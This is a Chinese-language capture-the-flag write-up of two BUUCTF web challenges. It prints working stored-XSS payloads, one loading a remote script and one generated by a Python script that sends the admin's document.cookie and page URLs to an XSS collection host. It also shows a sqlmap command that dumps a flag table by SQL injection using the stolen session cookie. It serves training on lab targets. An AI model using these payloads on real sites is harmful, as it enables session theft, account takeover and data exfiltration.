BUU XSS COURSE 1 & [CISCN2019 華東北賽區]Web2


BUU XSS COURSE 1 & [CISCN2019 華東北賽區]Web2

XSS的題目沒怎么做過,比賽基本上也沒有(=_=),總結下今天做的兩題

都是看趙總視頻現學現做的,這里附上學習鏈接,大家記得白嫖hhh~

BUU XSS COURSE 1

題解

這題點進去就兩個窗口,一個吐槽的,一個登陸。

但是沒有注冊頁面所以沒啥用,直接來吐槽

先嘗試彈窗<script>alert(1)</script>,訪問給的地址沒有彈窗

換個標簽試試<IMG SRC="javascript.:alert('XSS');">,訪問發現顯示了一個不存在的圖片,存在xss漏洞。

假圖

靶機無法訪問外網,用內網xss平台,注冊一個賬號,創建“我的項目”,模塊全點上,以后也能用。

</textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.buuoj.cn%2F8sVXk7%22%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>

把xss代碼在“吐槽”提交以后,訪問一下給的地址,回到XSS平台的項目內容就可以看到兩個剛接收到的內容,其中有一個是管理員訪問。

admin

利用管理員的cookie,以及來訪地址http://XXXXXXXXXXXXXXXXX.node3.buuoj.cn/backend/admin.php登錄即可得到flag(用chrome的edit this cookie插件比較方便)

flag

end。

[CISCN2019 華東北賽區]Web2

知識點

1、儲存型 XSS 與過濾繞過

附上CSP的知識:http://www.ruanyifeng.com/blog/2016/09/csp.html

2、SQL 注入

題解

這題打開先是一個論壇界面,內容都是超鏈接,我們點擊投稿發現要注冊,那就先注冊登錄。

發現一個投稿頁面,還有個反饋頁面,根據上面那題的思路,這題的解法應該是先在投稿文章內插入XSS代碼,然后通過反饋讓管理員審閱文章,從而竊取管理員的cookie。

先嘗試能不能彈窗,查看文章源代碼發現''(''被轉義成了"(",存在WAF。

上傳的內容需要轉碼來繞過WAF,用HTML Markup

趙總的腳本

in_str = "(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=xpqwIP&keepsession=0&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();"

output = ""

for c in in_str:
    output += "&#" + str(ord(c))

print("<svg><script>eval&#40&#34" + output + "&#34&#41</script>")

注意!!!id記得改成自己xss平台的,比如趙總腳本里的是xpqwIP,別搞錯了

生成的payload提交以后復制url,然后進反饋

反饋

地址前面記得改成web

md5截斷驗證用python腳本爆破,百度上挺多的。

填上URL和驗證碼提交,我們去XSS平台看看反饋2

我們用掃描器掃一下網,發現了admin.php

掃描

用剛才獲取的cookie登錄admin.php,測試發現存在sql注入(hhh盜用趙總id)

sql

用sqlmap跑一下,得到flag

sqlmap -u "http://6e5d7496-7b5f-4d94-b0e3-74ccf262a4d2.node3.buuoj.cn/admin.php?id=4" --cookie="PHPSESSID=8925446bf891203de8f1226880a9e296" -T flag --dump --flush-session --fresh-queries

做完啦~ 漲姿勢orz


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM